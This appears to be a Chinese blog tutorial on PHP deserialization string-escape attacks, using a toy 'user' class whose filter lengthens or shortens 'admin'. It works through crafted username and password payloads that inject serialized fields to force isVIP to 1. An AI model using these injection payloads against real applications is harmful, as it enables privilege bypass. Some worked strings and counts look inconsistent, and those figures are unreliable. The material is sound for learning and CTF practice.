php反序列化-字符串逃逸-增减多个字符

最新推荐文章于 2023-12-27 20:02:48 发布
最新推荐文章于 2023-12-27 20:02:48 发布
阅读量262 收藏 2
点赞数 1
文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61867082/article/details/131990205
版权

前言:

        众所周知php反序列化字符串逃逸,分为2种类型(字符串增多,字符串减少)。但网上大多数文章讲的都是增加一个字符或者减少一个字符串。对于增加减少多个字符串进行逃逸的文章,却少有人提及。本篇文章在特定源码的基础上,对增加减少多个字符串的情况进行简单分析。需要你有一定的字符串逃逸理论基础。如有错误欢迎批评指正。

一、字符串增多

1.1代码如下

假设前提必须使用admin才行

此时$P在}之后,随便写什么都可以,故没有放入文中

<?php
class user{
    public $username;
    public $password;
    public $isVIP;

    public function __construct($u, $p){
        $this->username = $u;
        $this->password = $p;
        $this->isVIP = 0;
    }

    function login(){
        $isVip=$this->isVIP;
        if($isVip==1){
            echo 'flag is niubi';
        }else{
            echo 'fuck';
        }
    }
}

//这里替换,分别增加1,2,3个字符
function filter($obj) {
    return preg_replace("/admin/","hacker或者hackerr或者hackerrr",$obj);  
}

1.2增加1个字符

//单个替换后,增加1了个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}  
O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}共计47个字符,用47个admin替换hacker,使";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}逃逸出去
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}"
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:282:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:282:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}

1.3增加2个字符

//单个替换后增加了2个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hackerr";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}"
//注意:47/2=23余1,多1位,$u可控所以$u内部s:5:"12345",让其少1位
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:161:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:161:"hackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerr";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}

1.4增加3个字符

//单个替换后增加了3个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hackerrr";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}"
//注意同理47/3=15余2,多两个,$u可控s:4:"1234"
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:120:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:120:"hackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerr";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}

二、字符串减少

假设前提必须使用admin才行

<?php
class user{
    public $username;
    public $password;
    public $isVIP;

    public function __construct($u, $p){
        $this->username = $u;
        $this->password = $p;
        $this->isVIP = 0;
    }

    function login(){
        $isVip=$this->isVIP;
        if($isVip==1){
            echo 'flag is niubi';
        }else{
            echo 'fuck';
        }
    }
}

//这里替换,分别减少1,2,3,4个字符
function filter($obj) {
    return preg_replace("/admin/","hack或者hac或者ha或者h",$obj);  
}

2.1减少1个字符

//单个替换减少1个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hack";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//";s:8:"password";s:6:"是不可能动的部分共计22个字符 ";s:8:"password";s:6:"之后的123456可以由$p控制
//由于替换每次每个admin-hack减少1个字符,总计需要22个admin
$u='adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:110:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}
O:4:"user":3:{s:8:"username";s:110:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}

2.2减少2个字符

//单个替换减少2个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hac";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//同理22/2=11用11个admin
$u='adminadminadminadminadminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:55:"adminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:55:"hachachachachachachachachachachac";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}

2.3减少3个字符

先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面

O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}  
O:4:"user":3:{s:8:"username";s:5:"ha";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u='adminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
O:4:"user":3:{s:8:"username";s:35:"adminadminadminadminadminadminadmin";s:8:"password";s:45:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:35:"hahahahahahaha";s:8:"password";s:45:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}

2.3减少4个字符

先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面

O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}   # 
O:4:"user":3:{s:8:"username";s:5:"h";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u='adminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
O:4:"user":3:{s:8:"username";s:25:"adminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:25:"hhhhh";s:8:"password";s:46:";s:8:"password";s:6:"1

istarboss
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHP反序列化字符串逃逸
v2ish1yan的博客
04-15 1664
php反序列化字符串逃逸
php反序列化
n1ght的博客
11-30 705
php反序列化,和php的session反序列化php原生类
3 ways to serialize variables in php
weixin_34112181的博客
08-01 191
序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。1. serialize和unserialize函数这两个是序列化和反序列化PHP中数据的常用函数。 Php代码 $a=array('a'=>'Apple','b'=>...
PHP反序列化漏洞
2301_77004573的博客
09-09 164
PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。可以理解为一种编码方式。序列化的目的是将数据转换为可传输或可存储的形式,使其能够在不同的平台、操作系统或编程语言之间进行交互,而不会损失原始数据的结构和内容。通过序列化,数据可以被编码成字节流,然后在需要时可以进行反序列化恢复为原始的数据结构或对象。反推法:由于类之间的关系常常十分复杂,正推不太现实,所以需要从突破口开始反推解题。php?分析一下代码:定义了三个类:index,normal,evil。
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1146
php反序列化字符逃逸
PHP反序列化字符逃逸
weixin_72667582的博客
06-28 148
php反序列化字符逃逸
PHP反序列化_02字符串逃逸(小白学习记录ing)
最新发布
m0_74408192的博客
12-27 432
今天讲讲字符串逃逸。题目中可能会用它把flag藏起来。
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $_POST['password']) { $username = $_POST['username']; $password = $_POST['password']; if(strlen($username
JavaScript实现的反序列化json字符串操作示例
01-21
本文实例讲述了JavaScript实现的反序列化json字符串操作。分享给大家供大家参考,具体如下: JavaScript中如何反序列化json字符串呢? 有如下两种方法: (1) 使用万能的eval var jsonText = '{name:acwong,age:23,...
JSON PHP中,Json字符串反序列化成对象/数组的方法
10-18
今天小编就为大家分享一篇JSON PHP中,Json字符串反序列化成对象/数组的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
C#实现JSON字符串序列化与反序列化的方法
12-31
C#将对象序列化成JSON字符串 public string GetJsonString() { List<Product> products = new List(){ new Product(){Name=苹果,Price=5}, new Product(){Name=橘子,Price=5}, new Product(){Name=干柿子,Price...
------已搬运-------PHP反序列化字符逃逸入门笔记
Zero_Adam的博客
02-02 428
放在最前面: 这是我拿来复习用的。您要是想学的话,请从 基础知识和一些特性 那里开始看起。 字符数变多的套路 解释 增多:。我们输入的时候少,加工后他会变多。 那么我们就在输入的时候再加上构造的。然后 变多之后,就把我们构造的给挤出来。从而实现 详细解释 一个字符串数量会变多的话,就把我们要构造的那一串序列化之后的字符串接到该变量的最后(记得那个序列化的字符串,该闭合的都给闭合了)。然后添加了几个字符的数量 再加上他减少之后剩下的字符的数量要 === 他增多之后的总的数量,从而把我们构造的那些给 挤出去
php反序列化姿势学习
彼岸花苏陌的博客
01-16 2217
php反序列化姿势学习1.__wakeup()函数绕过2./[oc]:\d+:/i研究欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.__wakeup()函数绕过 wakeup函数作为ph
PHP反序列化字符逃逸详解
qq_45521281的博客
07-05 7368
文章目录第一种情况:替换修改后导致序列化字符串变长例题——[0CTF 2016]piapiapia第二种情况——替换之后导致序列化字符串变短实例——[安洵杯 2019]easy_serialize_php 此类题目的本质就是改变序列化字符串的长度,导致反序列化漏洞 这种题目有个共同点: php序列化后的字符串经过了替换或者修改,导致字符串长度发生变化。 总是先进行序列化,再进行替换修改操作。 第一种情况:替换修改后导致序列化字符串变长 示例代码: <?php function filter($st
逃逸字符%的详细解释
熊晓杰 -- (暴熊 || kongbu0621 || kongbu0622) 的专栏
12-08 2019
逃逸字符%的详细解释1、%是个ESCAPE字符,通常将之译为转义字符,但也有更形象的译名脱逸字符逃逸字符等。也就是说%不仅仅将与其相关的特定字符串转义并替换为特定字符串,而且自身也会被“脱逸”。而且类似于C语言中的转义字符"/",双%会转义并脱逸为单%,四%则脱为双%。      2、for本身是一个特殊的命令,类似于一个特化的命令解释器,因为它的功能实现需要执行多条语句,因此它必须也具有对
php反序列化字符串逃逸是什么
02-07
PHP 中,反序列化是指将序列化的字符串转换为原来的 PHP 对象。但是,如果字符串中含有恶意代码,反序列化过程就可能导致漏洞的产生。这种情况就称为“反序列化字符串逃逸”。 举个例子,假设你有一个函数可以将用户提交的数据存储在一个 cookie 中,然后从 cookie 中读取并反序列化这些数据。如果攻击者能够提交恶意序列化数据,那么在反序列化过程中就会运行恶意代码。这就是“反序列化字符串逃逸”的攻击手段。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值